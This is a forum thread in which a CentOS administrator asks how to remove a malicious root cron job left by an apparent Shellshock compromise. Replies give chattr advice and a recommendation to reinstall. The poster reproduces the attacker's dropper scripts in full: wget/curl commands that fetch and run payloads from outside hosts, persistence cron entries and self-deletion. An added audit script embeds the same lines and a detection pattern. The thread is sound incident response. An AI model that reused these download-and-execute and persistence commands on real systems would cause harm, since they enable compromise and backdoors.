How can I remove the cron made by the "stablehost" vulnerability?

Support for security such as Firewalls and securing linux
tomingy
Posts: 7
Joined: 2007/11/07 07:39:03

How can I remove the cron made by the "stablehost" vulnerability?

Post by tomingy » 2014/10/04 18:58:28

My box was just affected by

@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1

a few hours ago. But I think I am safe now because my bash version is


[root@fr02 cron]# rpm -q bash
bash-4.1.2-15.el6_5.2.x86_64
It created a cron under root. In /var/spool/cron/root, it has the above syntax.


[root@fr02 cron]# crontab -l
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
[root@fr02 cron]#
I tried to use crontab -e, used webmin to disable/remove it, and even tried a hard delete, but all with no luck.


in /var/spool/cron/root
...
-rw-------   1 root root  104 Oct  4 09:11 root
...
[root@fr02 cron]# rm root
rm: remove regular file `root'? y
rm: cannot remove `root': Permission denied
[root@fr02 cron]# echo '' > root
-bash: root: Permission denied
Is there a way to disable or remove it?

Thanks.

poky
Posts: 89
Joined: 2013/03/27 12:18:03

Re: How can I remove the cron made by the "stablehost" vulnerability?

Post by poky » 2014/10/04 22:20:55

Try (before rm):
chattr -i -a root
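As an added example (not code from the thread or from any poster), a small POSIX sh audit for the two symptoms seen here: a cron entry that fetches a payload into /tmp and runs it, and the immutable/append-only attributes that made rm and crontab -e fail until chattr -i -a cleared them. The sample crontab it builds is constructed from the entries quoted in this thread plus one benign job; the audit_crontab path is whatever spool file you point it at.

```shell
#!/bin/sh
# Added example, not code from the thread: audit a crontab spool file for the
# two symptoms reported above, a download-and-execute entry and the
# immutable/append-only attributes that made "rm" and "crontab -e" fail.

# Regex for "fetch a payload into /tmp and run it" cron entries.
DROP_AND_RUN='(wget|curl|fetch)[^;]*/tmp/|;[[:space:]]*sh[[:space:]]+/tmp/'

# Print the entries of a crontab file that match DROP_AND_RUN.
suspicious_cron_entries() {
    grep -E "$DROP_AND_RUN" "$1" || :
}

# Print how many entries match (prints 0 when none; grep -c exits 1 there).
count_suspicious() {
    grep -cE "$DROP_AND_RUN" "$1" || :
}

# Return 0 if an lsattr flag field (e.g. "----i--------e--") carries the
# immutable (i) or append-only (a) bit; these are what "chattr -i -a" clears.
attr_flags_locked() {
    case "$1" in
        *i*|*a*) return 0 ;;
        *)       return 1 ;;
    esac
}

# Report whether a live file is locked; prints "locked", "clear" or
# "unknown" (no lsattr, or a filesystem without attribute support).
file_lock_state() {
    flags=$(lsattr -d "$1" 2>/dev/null | awk '{print $1}')
    [ -z "$flags" ] && { echo unknown; return; }
    attr_flags_locked "$flags" && echo locked || echo clear
}

# Constructed sample crontab: the entries quoted in this thread plus one benign job.
make_sample_crontab() {
    f=$(mktemp) || exit 1
    cat >"$f" <<'EOF'
0 3 * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
@daily wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update
EOF
    echo "$f"
}

# Usage: audit_crontab /var/spool/cron/root
audit_crontab() {
    echo "$1: attributes $(file_lock_state "$1"), $(count_suspicious "$1") suspicious entries"
    suspicious_cron_entries "$1"
}
```

A "locked" result explains the Permission denied seen even as root; a non-zero count is the hint that the cron spool, not just bash, needs attention.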

TrevorH
Forum Moderator
Posts: 23205
Joined: 2009/09/24 10:40:56
Location: Brighton, UK

Re: How can I remove the cron made by the "stablehost" vulnerability?

Post by TrevorH » 2014/10/04 22:23:30

If they have root access then you have no idea what else they have done. Your only safe option is to take that box off the net and reinstall it. It could have dozens of backdoors installed and you don't know any of them.

They had root access. They could have done anything to your machine. It might have a keylogger installed that's catching all your attempts to clean up. It could be sending your ssh keys and passwords out to who knows where...
CentOS 5 died in March 2017 - migrate NOW!
Full time Geek, part time moderator. Use the FAQ Luke

tomingy
Posts: 7
Joined: 2007/11/07 07:39:03

Re: How can I remove the cron made by the "stablehost" vulnerability?

Post by tomingy » 2014/10/05 03:22:48

poky wrote: Try (before rm):
chattr -i -a root
Thank you. It worked.

tomingy
Posts: 7
Joined: 2007/11/07 07:39:03

Re: How can I remove the cron made by the "stablehost" vulnerability?

Post by tomingy » 2014/10/05 03:46:02

TrevorH wrote:If they have root access then you have no idea what else they have done. Your only safe option is to take that box off the net and reinstall it. It could have dozens of backdoors installed and you don't know any of them.

They had root access. They could have done anything to your machine. It might have a keylogger installed that's catching all your attempts to clean up. It could be sending your ssh keys and passwords out to who knows where...
I agree with what you said. I need to reinstall the box.

I did not notice my box was affected until I received an email from the Cron Daemon.
--2014-10-05 00:00:01-- http://stablehost.us/bots/regular.bot
Resolving stablehost.us... failed: No address associated with hostname.
wget: unable to resolve host address “stablehost.us”
Then I immediately checked /tmp; it contained the following sh scripts, which were all created a few hours ago.
[root@fr02 tmp]# vi .pwn

wget http://www.computer-services.name/b.c -O /tmp/b.c;
curl -o /tmp/b.c http://www.computer-services.name/b.c;
fetch -o /tmp/b.c http://www.computer-services.name/b.c;
wget http://www.computer-services.name/b.c -O /tmp/.c;
curl -o /tmp/.c http://www.computer-services.name/.c;
fetch -o /tmp/.c http://www.computer-services.name/.c;
gcc -o .d /tmp/b.c
chmod +x /tmp/.c
/tmp/.c
/tmp/.d
rm -rf /tmp/.a /tmp/b.c /tmp/.c /tmp/.d

echo "@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2&1" >>/tmp/c
crontab /tmp/c
rm -rf /tmp/c
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
@daily wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update
@daily wget http://update2.x24hr.com/update2 -O /tmp/update2;sh /tmp/update2;rm -rf /tmp/update2
@daily wget http://update.mrbonus.com/update3 -O /tmp/update3;sh /tmp/update3;rm -rf /tmp/update3
cron.weekly
#!/bin/sh
#wget http://stablehost.us/bots/regular.bot -O /tmp/sh
#curl -o /tmp/sh http://stablehost.us/bots/regular.bot
#sh /tmp/sh
#rm -rf /tmp/sh
img.sh
#!/bin/sh
starts=`pwd`
str=`date | md5sum | head -c8`
wget http://82.165.131.9/imgs.png -O $str;chmod +x $str;./$str;rm -rf $str
echo $str

echo "@daily wget http://xfsdfadsdgfs.tba.pw/update -O /tmp/update;sh /tmp/update;rm -rf /tmp/update">>/tmp/cc
echo "@daily wget http://update2.x24hr.com/update2 -O /tmp/update2;sh /tmp/update2;rm -rf /tmp/update2">>/tmp/cc
echo "@daily wget http://update.mrbonus.com/update3 -O /tmp/update3;sh /tmp/update3;rm -rf /tmp/update3">>/tmp/cc
crontab /tmp/cc
apt-get -y install bash&
yum -y update bash&
zypper --non-interactive update bash&


shred -f -u $starts/$0
rm -f $starts/$0
But it seems all hosts have been taken down. Then I ran yum to update bash.
